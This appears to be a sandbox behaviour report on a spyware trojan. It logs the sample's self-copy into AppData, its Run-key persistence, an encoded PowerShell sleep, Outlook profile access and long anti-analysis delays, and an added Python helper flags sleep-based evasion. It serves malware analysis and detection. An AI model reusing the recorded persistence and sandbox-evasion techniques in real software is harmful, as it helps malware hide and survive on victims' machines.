Source: C:\Users\user\Desktop\SC_0017384.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Source: C:\Users\user\Desktop\SC_0017384.exe File created: C:\Users\user\AppData\Roaming\Jqtuyob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgjipv3a.uw1.ps1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@26/13@11/7
Source: C:\Users\user\Desktop\SC_0017384.exe File read: C:\Users\user\Desktop\desktop.ini
Source: SC_0017384.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SC_0017384.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:472:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_01
Source: C:\Users\user\Desktop\SC_0017384.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SC_0017384.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: SC_0017384.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SC_0017384.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SC_0017384.exe, SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041AB65 pushad ; retf 3_2_0041AB6A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0040DCD0 push ebp; retf 3_2_0040DC71
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041A5D7 push es; iretd 3_2_0041A5F6
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_00422DFB push dword ptr [DF27AEF3h]; ret 3_2_00422E85
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_00401D80 push eax; ret 3_2_00401D82
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_00406D88 pushfd ; ret 3_2_00406D8C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004055AA push esp; ret 3_2_004055AD
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041B612 push edi; ret 3_2_0041B61B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004116DF pushfd ; retf 3_2_004116E6
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017BD0D1 push ecx; ret 3_2_017BD0E4
Source: C:\Users\user\Desktop\SC_0017384.exe File created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: C:\Users\user\Desktop\SC_0017384.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Lvdnyvcvr
Source: C:\Users\user\Desktop\SC_0017384.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5980 Thread sleep count: 2343 > 30
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99812s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99700s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99593s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99484s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99372s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99265s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99151s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99042s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -98916s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1380 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 3856 Thread sleep count: 2522 > 30
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99848s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99714s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99609s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99499s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99385s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99274s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99172s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99057s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -98953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -98844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 2248 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 5724 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5740 Thread sleep count: 2179 > 30
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99661s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99545s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99436s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99184s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99075s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -98968s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5716 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004 Thread sleep count: 9436 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01835BA5 rdtsc 3_2_01835BA5
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SC_0017384.exe Window / User API: threadDelayed 2343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9412
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 736
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 703
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Window / User API: threadDelayed 2522
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Window / User API: threadDelayed 2179
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9589
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9436
Source: C:\Users\user\Desktop\SC_0017384.exe API coverage: 9.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99812 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99700 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99593 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99484 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99372 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99265 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99151 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99042 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 98916 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99848 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99714 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99609 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99499 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99385 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99274 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99172 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99057 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 98953 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 98844 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99844
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99661
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99545
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99436
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99184
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99075
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 98968
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
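The "Thread delayed" and "threadDelayed" entries above are easier to triage per process than line by line. The following is an added example (not part of the sandbox report and not the sample's code) that parses lines of exactly that shape and aggregates them. The sample lines are constructed from the entries above; the thresholds are chosen for the example. Treating 922337203685477 ms as an infinite wait is this example's interpretation: the value equals 2^63 / 10^4, which is what a relative NtDelayExecution interval of INT64_MIN becomes when expressed in milliseconds, but the report itself does not say how it derived the number.

```python
"""Summarise sleep-based evasion entries from a sandbox behaviour report.

Added example, not part of the original report. It parses lines shaped like
the "Thread delayed: delay time: N" and "Window / User API: threadDelayed N"
entries and aggregates them per process so an analyst can see which
processes stall execution and how.
"""
import re
from collections import defaultdict

# 922337203685477 ms == 2**63 // 10_000. Interpreting it as an infinite
# (INT64_MIN) relative NtDelayExecution interval rendered in milliseconds is
# this example's assumption, not a statement taken from the report.
INFINITE_SENTINEL_MS = 2**63 // 10_000
LONG_SLEEP_MS = 3 * 60 * 1000   # threshold chosen for this example: 3 minutes
MANY_DELAY_CALLS = 1000         # threshold chosen for this example

_SRC = re.compile(r"^Source:\s+(?P<path>.+?\.exe)\s+(?P<rest>.*)$")
_DELAY = re.compile(r"Thread delayed: delay time: (?P<ms>\d+)")
_API = re.compile(r"Window / User API: threadDelayed (?P<n>\d+)")

# Constructed sample: a handful of lines in the report's own format.
SAMPLE_REPORT = r"""
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99812 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Window / User API: threadDelayed 2522 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9412 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 736 Jump to behavior
"""


def parse_delay_entries(report_text):
    """Return (process_name, kind, value) for every sleep-related line.

    kind is "delay_ms" (one delay call of `value` milliseconds) or
    "delay_calls" (the report's count of thread-delay API calls).
    Lines that are not sleep entries (e.g. foregroundWindowGot) are skipped.
    """
    entries = []
    for line in report_text.splitlines():
        m = _SRC.match(line.strip())
        if not m:
            continue
        proc = m.group("path").rsplit("\\", 1)[-1]   # basename of the image path
        rest = m.group("rest")
        d = _DELAY.search(rest)
        if d:
            entries.append((proc, "delay_ms", int(d.group("ms"))))
            continue
        a = _API.search(rest)
        if a:
            entries.append((proc, "delay_calls", int(a.group("n"))))
    return entries


def summarize(entries):
    """Aggregate per process: infinite sleeps, finite sleep total, API call count."""
    summary = defaultdict(lambda: {"infinite": 0, "finite_ms": 0, "delay_calls": 0})
    for proc, kind, value in entries:
        s = summary[proc]
        if kind == "delay_ms":
            if value >= INFINITE_SENTINEL_MS:
                s["infinite"] += 1
            else:
                s["finite_ms"] += value
        else:
            s["delay_calls"] += value
    return dict(summary)


def flag_evasive(summary, long_ms=LONG_SLEEP_MS, many_calls=MANY_DELAY_CALLS):
    """Return, sorted, the processes whose sleep pattern looks like evasion."""
    flagged = []
    for proc, s in sorted(summary.items()):
        if s["infinite"] or s["finite_ms"] >= long_ms or s["delay_calls"] >= many_calls:
            flagged.append(proc)
    return flagged


if __name__ == "__main__":
    summary = summarize(parse_delay_entries(SAMPLE_REPORT))
    for proc, s in sorted(summary.items()):
        print(f"{proc:20s} infinite={s['infinite']} finite_ms={s['finite_ms']} "
              f"delay_calls={s['delay_calls']}")
    print("flagged:", flag_evasive(summary))
```

On the constructed lines the summary separates the two kinds of evidence: the dropped copy Lvdnyvcvr.exe and the original sample both issue an infinite delay, while powershell.exe is flagged purely on the volume of thread-delay calls. The descending 100000, 99812, 99700, ... series in the report reads as one long sleep performed in decreasing slices rather than many independent sleeps, which is why the example sums finite delays per process instead of counting them.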
Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001412000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: Lvdnyvcvr.exe, 00000005.00000002.567915888.0000000005DED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.582466322.0000000004437000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Lvdnyvcvr.exe, 00000009.00000002.574184145.0000000005E40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
